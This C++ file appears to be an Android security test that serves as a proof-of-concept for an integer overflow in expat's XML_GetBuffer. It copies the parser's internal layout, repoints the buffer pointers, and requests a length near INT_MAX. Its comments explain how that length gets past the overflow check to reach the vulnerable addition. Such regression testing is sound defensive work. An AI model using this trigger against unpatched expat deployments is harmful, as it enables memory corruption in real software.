1 /*
2  * Copyright (C) 2024 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include <unistd.h>
18 
19 #include <vector>
20 
21 #include "common.h"
22 #include "expat.h"
23 #include "expat_config.h"
24 #include "expat_external.h"
25 #include "internal.h"
26 #include "xmlrole.h"
27 
// Capacity of the 'xml_malloc_list' allocation log: 2^20 (1024 * 1024) entries.
constexpr long kMaxEntries = 1L << 20;
29 
30 // Defining 'kBufferSize' such that 'kBufferPtrOffset' is greater than XML_CONTENT_BYTES, but still
31 // within a valid memory region. Defining end offset to be after the pointer offset.
32 constexpr size_t kBufferSize = XML_CONTEXT_BYTES + 2;
33 constexpr size_t kBufferPtrOffset = kBufferSize - 1;
34 constexpr size_t kBufferEndOffset = kBufferPtrOffset + 1;
35 
36 // Setting 'kBufferLength' such that value of 'neededSize' defined in external/expat/lib/xmlparse.c
37 // is INT_MAX so that an integer overflow check on 'neededSize' is avoided so that control reaches
38 // the line 'neededSize += keep;'.
39 constexpr size_t kBufferLength = INT_MAX - (kBufferEndOffset - kBufferPtrOffset);
40 
// The following structure definitions mirror the definitions of the same name in
// external/expat/lib/xmlparse.c.
// The test declares them explicitly because the originals live inside the vulnerable source
// file itself and therefore cannot be included in the PoC directly.
45 
46 typedef enum XML_Error PTRCALL Processor(XML_Parser parser, const char *start, const char *end,
47                                          const char **endPtr);
48 
49 typedef struct binding {
50     struct prefix *prefix;
51     struct binding *nextTagBinding;
52     struct binding *prevPrefixBinding;
53     const struct attribute_id *attId;
54     XML_Char *uri;
55     int uriLen;
56     int uriAlloc;
57 } BINDING;
58 
59 typedef struct prefix {
60     const XML_Char *name;
61     BINDING *binding;
62 } PREFIX;
63 
64 typedef struct {
65     const XML_Char *name;
66     const XML_Char *textPtr;
67     int textLen;   /* length in XML_Chars */
68     int processed; /* # of processed bytes - when suspended */
69     const XML_Char *systemId;
70     const XML_Char *base;
71     const XML_Char *publicId;
72     const XML_Char *notation;
73     XML_Bool open;
74     XML_Bool is_param;
75     XML_Bool is_internal; /* true if declared in internal subset outside PE */
76 } ENTITY;
77 
78 typedef struct open_internal_entity {
79     const char *internalEventPtr;
80     const char *internalEventEndPtr;
81     struct open_internal_entity *next;
82     ENTITY *entity;
83     int startTagLevel;
84     XML_Bool betweenDecl; /* WFC: PE Between Declarations */
85 } OPEN_INTERNAL_ENTITY;
86 
87 typedef struct attribute_id {
88     XML_Char *name;
89     PREFIX *prefix;
90     XML_Bool maybeTokenized;
91     XML_Bool xmlns;
92 } ATTRIBUTE_ID;
93 
94 typedef struct {
95     const ATTRIBUTE_ID *id;
96     XML_Bool isCdata;
97     const XML_Char *value;
98 } DEFAULT_ATTRIBUTE;
99 
100 typedef struct {
101     const XML_Char *name;
102     PREFIX *prefix;
103     const ATTRIBUTE_ID *idAtt;
104     int nDefaultAtts;
105     int allocDefaultAtts;
106     DEFAULT_ATTRIBUTE *defaultAtts;
107 } ELEMENT_TYPE;
108 
109 typedef struct {
110     enum XML_Content_Type type;
111     enum XML_Content_Quant quant;
112     const XML_Char *name;
113     int firstchild;
114     int lastchild;
115     int childcnt;
116     int nextsib;
117 } CONTENT_SCAFFOLD;
118 
119 typedef struct block {
120     struct block *next;
121     int size;
122     XML_Char s[1];
123 } BLOCK;
124 
125 typedef struct {
126     BLOCK *blocks;
127     BLOCK *freeBlocks;
128     const XML_Char *end;
129     XML_Char *ptr;
130     XML_Char *start;
131     const XML_Memory_Handling_Suite *mem;
132 } STRING_POOL;
133 
134 typedef const XML_Char *KEY;
135 
136 typedef struct {
137     KEY name;
138 } NAMED;
139 
140 typedef struct {
141     NAMED **v;
142     unsigned char power;
143     size_t size;
144     size_t used;
145     const XML_Memory_Handling_Suite *mem;
146 } HASH_TABLE;
147 
148 typedef struct {
149     HASH_TABLE generalEntities;
150     HASH_TABLE elementTypes;
151     HASH_TABLE attributeIds;
152     HASH_TABLE prefixes;
153     STRING_POOL pool;
154     STRING_POOL entityValuePool;
155     /* false once a parameter entity reference has been skipped */
156     XML_Bool keepProcessing;
157     /* true once an internal or external PE reference has been encountered;
158        this includes the reference to an external subset */
159     XML_Bool hasParamEntityRefs;
160     XML_Bool standalone;
161 #ifdef XML_DTD
162     /* indicates if external PE has been read */
163     XML_Bool paramEntityRead;
164     HASH_TABLE paramEntities;
165 #endif /* XML_DTD */
166     PREFIX defaultPrefix;
167     /* === scaffolding for building content model === */
168     XML_Bool in_eldecl;
169     CONTENT_SCAFFOLD *scaffold;
170     unsigned contentStringLen;
171     unsigned scaffSize;
172     unsigned scaffCount;
173     int scaffLevel;
174     int *scaffIndex;
175 } DTD;
176 
177 typedef struct {
178     const XML_Char *str;
179     const XML_Char *localPart;
180     const XML_Char *prefix;
181     int strLen;
182     int uriLen;
183     int prefixLen;
184 } TAG_NAME;
185 
186 typedef struct tag {
187     struct tag *parent;  /* parent of this element */
188     const char *rawName; /* tagName in the original encoding */
189     int rawNameLength;
190     TAG_NAME name; /* tagName in the API encoding */
191     char *buf;     /* buffer for name components */
192     char *bufEnd;  /* end of the buffer */
193     BINDING *bindings;
194 } TAG;
195 
196 typedef struct {
197     unsigned long version;
198     unsigned long hash;
199     const XML_Char *uriName;
200 } NS_ATT;
201 
#ifdef XML_DTD
// Records that XML_ParserStruct embeds by value ('m_accounting', 'm_entity_stats') when
// XML_DTD is defined. They mirror the same-named definitions in xmlparse.c.
using XmlBigCount = unsigned long long;

struct accounting {
    XmlBigCount countBytesDirect;
    XmlBigCount countBytesIndirect;
    int debugLevel;
    float maximumAmplificationFactor;  // >=1.0
    unsigned long long activationThresholdBytes;
};
using ACCOUNTING = struct accounting;

struct entity_stats {
    unsigned int countEverOpened;
    unsigned int currentDepth;
    unsigned int maximumDepthSeen;
    int debugLevel;
};
using ENTITY_STATS = struct entity_stats;
#endif  // XML_DTD
219 
// Local definition of the parser object that XML_Parser points at. main() verifies that the
// library allocated exactly sizeof(struct XML_ParserStruct) bytes for the parser and then
// writes 'm_buffer', 'm_bufferPtr', 'm_bufferEnd' and 'm_bufferLim' through this layout, so
// member order, member types and the placement of the #ifdef sections must not be changed
// independently of external/expat/lib/xmlparse.c.
struct XML_ParserStruct {
    /* The first member must be m_userData so that the XML_GetUserData
        macro works. */
    void *m_userData;
    void *m_handlerArg;
    /* start of the input buffer; main() repoints this at its own storage */
    char *m_buffer;
    const XML_Memory_Handling_Suite m_mem;
    /* first character to be parsed */
    const char *m_bufferPtr;
    /* past last character to be parsed */
    char *m_bufferEnd;
    /* allocated end of m_buffer */
    const char *m_bufferLim;
    XML_Index m_parseEndByteIndex;
    const char *m_parseEndPtr;
    XML_Char *m_dataBuf;
    XML_Char *m_dataBufEnd;
    /* user-installed callback slots */
    XML_StartElementHandler m_startElementHandler;
    XML_EndElementHandler m_endElementHandler;
    XML_CharacterDataHandler m_characterDataHandler;
    XML_ProcessingInstructionHandler m_processingInstructionHandler;
    XML_CommentHandler m_commentHandler;
    XML_StartCdataSectionHandler m_startCdataSectionHandler;
    XML_EndCdataSectionHandler m_endCdataSectionHandler;
    XML_DefaultHandler m_defaultHandler;
    XML_StartDoctypeDeclHandler m_startDoctypeDeclHandler;
    XML_EndDoctypeDeclHandler m_endDoctypeDeclHandler;
    XML_UnparsedEntityDeclHandler m_unparsedEntityDeclHandler;
    XML_NotationDeclHandler m_notationDeclHandler;
    XML_StartNamespaceDeclHandler m_startNamespaceDeclHandler;
    XML_EndNamespaceDeclHandler m_endNamespaceDeclHandler;
    XML_NotStandaloneHandler m_notStandaloneHandler;
    XML_ExternalEntityRefHandler m_externalEntityRefHandler;
    XML_Parser m_externalEntityRefHandlerArg;
    XML_SkippedEntityHandler m_skippedEntityHandler;
    XML_UnknownEncodingHandler m_unknownEncodingHandler;
    XML_ElementDeclHandler m_elementDeclHandler;
    XML_AttlistDeclHandler m_attlistDeclHandler;
    XML_EntityDeclHandler m_entityDeclHandler;
    XML_XmlDeclHandler m_xmlDeclHandler;
    const ENCODING *m_encoding;
    INIT_ENCODING m_initEncoding;
    const ENCODING *m_internalEncoding;
    const XML_Char *m_protocolEncodingName;
    XML_Bool m_ns;
    XML_Bool m_ns_triplets;
    void *m_unknownEncodingMem;
    void *m_unknownEncodingData;
    void *m_unknownEncodingHandlerData;
    void(XMLCALL *m_unknownEncodingRelease)(void *);
    PROLOG_STATE m_prologState;
    Processor *m_processor;
    enum XML_Error m_errorCode;
    const char *m_eventPtr;
    const char *m_eventEndPtr;
    const char *m_positionPtr;
    OPEN_INTERNAL_ENTITY *m_openInternalEntities;
    OPEN_INTERNAL_ENTITY *m_freeInternalEntities;
    XML_Bool m_defaultExpandInternalEntities;
    int m_tagLevel;
    ENTITY *m_declEntity;
    const XML_Char *m_doctypeName;
    const XML_Char *m_doctypeSysid;
    const XML_Char *m_doctypePubid;
    const XML_Char *m_declAttributeType;
    const XML_Char *m_declNotationName;
    const XML_Char *m_declNotationPublicId;
    ELEMENT_TYPE *m_declElementType;
    ATTRIBUTE_ID *m_declAttributeId;
    XML_Bool m_declAttributeIsCdata;
    XML_Bool m_declAttributeIsId;
    DTD *m_dtd;
    const XML_Char *m_curBase;
    TAG *m_tagStack;
    TAG *m_freeTagList;
    BINDING *m_inheritedBindings;
    BINDING *m_freeBindingList;
    int m_attsSize;
    int m_nSpecifiedAtts;
    int m_idAttIndex;
    ATTRIBUTE *m_atts;
    NS_ATT *m_nsAtts;
    unsigned long m_nsAttsVersion;
    unsigned char m_nsAttsPower;
    /* present only when the build defines XML_ATTR_INFO */
#ifdef XML_ATTR_INFO
    XML_AttrInfo *m_attInfo;
#endif
    POSITION m_position;
    STRING_POOL m_tempPool;
    STRING_POOL m_temp2Pool;
    char *m_groupConnector;
    unsigned int m_groupSize;
    XML_Char m_namespaceSeparator;
    XML_Parser m_parentParser;
    XML_ParsingStatus m_parsingStatus;
    /* the two XML_DTD sections are separate on purpose: m_hash_secret_salt sits between them */
#ifdef XML_DTD
    XML_Bool m_isParamEntity;
    XML_Bool m_useForeignDTD;
    enum XML_ParamEntityParsing m_paramEntityParsing;
#endif
    unsigned long m_hash_secret_salt;
#ifdef XML_DTD
    ACCOUNTING m_accounting;
    ENTITY_STATS m_entity_stats;
#endif
};
326 
327 XML_Parser parser;
328 
329 struct mem_struct_t {
330     void *mem_ptr;
331     size_t mem_size;
332 };
333 
334 mem_struct_t xml_malloc_list[kMaxEntries];
335 static int xml_malloc_list_size = 0;
336 
xml_malloc(size_t size)337 void *xml_malloc(size_t size) {
338     void *ptr = malloc(size);
339     if (xml_malloc_list_size < kMaxEntries) {
340         xml_malloc_list[xml_malloc_list_size].mem_ptr = ptr;
341         xml_malloc_list[xml_malloc_list_size].mem_size = size;
342         ++xml_malloc_list_size;
343     }
344     return ptr;
345 }
346 
match_allocation_size(void * target_ptr,int target_size)347 bool match_allocation_size(void *target_ptr, int target_size) {
348     for (int i = 0; i < xml_malloc_list_size; ++i) {
349         if (target_ptr == xml_malloc_list[i].mem_ptr &&
350             target_size == xml_malloc_list[i].mem_size) {
351             return true;
352         }
353     }
354     return false;
355 }
356 
main()357 int main() {
358     XML_Memory_Handling_Suite memsuite = {};
359     memsuite.malloc_fcn = xml_malloc;
360     memsuite.realloc_fcn = realloc;
361     memsuite.free_fcn = free;
362     parser = XML_ParserCreate_MM(nullptr, &memsuite, nullptr);
363     FAIL_CHECK(parser);
364 
365     bool match_found = match_allocation_size(parser, sizeof(struct XML_ParserStruct));
366     FAIL_CHECK(match_found);
367 
368     std::vector<char> m_buffervector(kBufferSize);
369     parser->m_buffer = m_buffervector.data();
370     FAIL_CHECK(parser->m_buffer);
371 
372     parser->m_bufferPtr = parser->m_buffer + kBufferPtrOffset;
373     parser->m_bufferEnd = parser->m_buffer + kBufferEndOffset;
374     parser->m_bufferLim = parser->m_bufferEnd + 1;
375 
376     XML_GetBuffer(parser, kBufferLength);
377 
378     if (parser) {
379         free(parser);
380         parser = nullptr;
381     }
382     return EXIT_SUCCESS;
383 }
384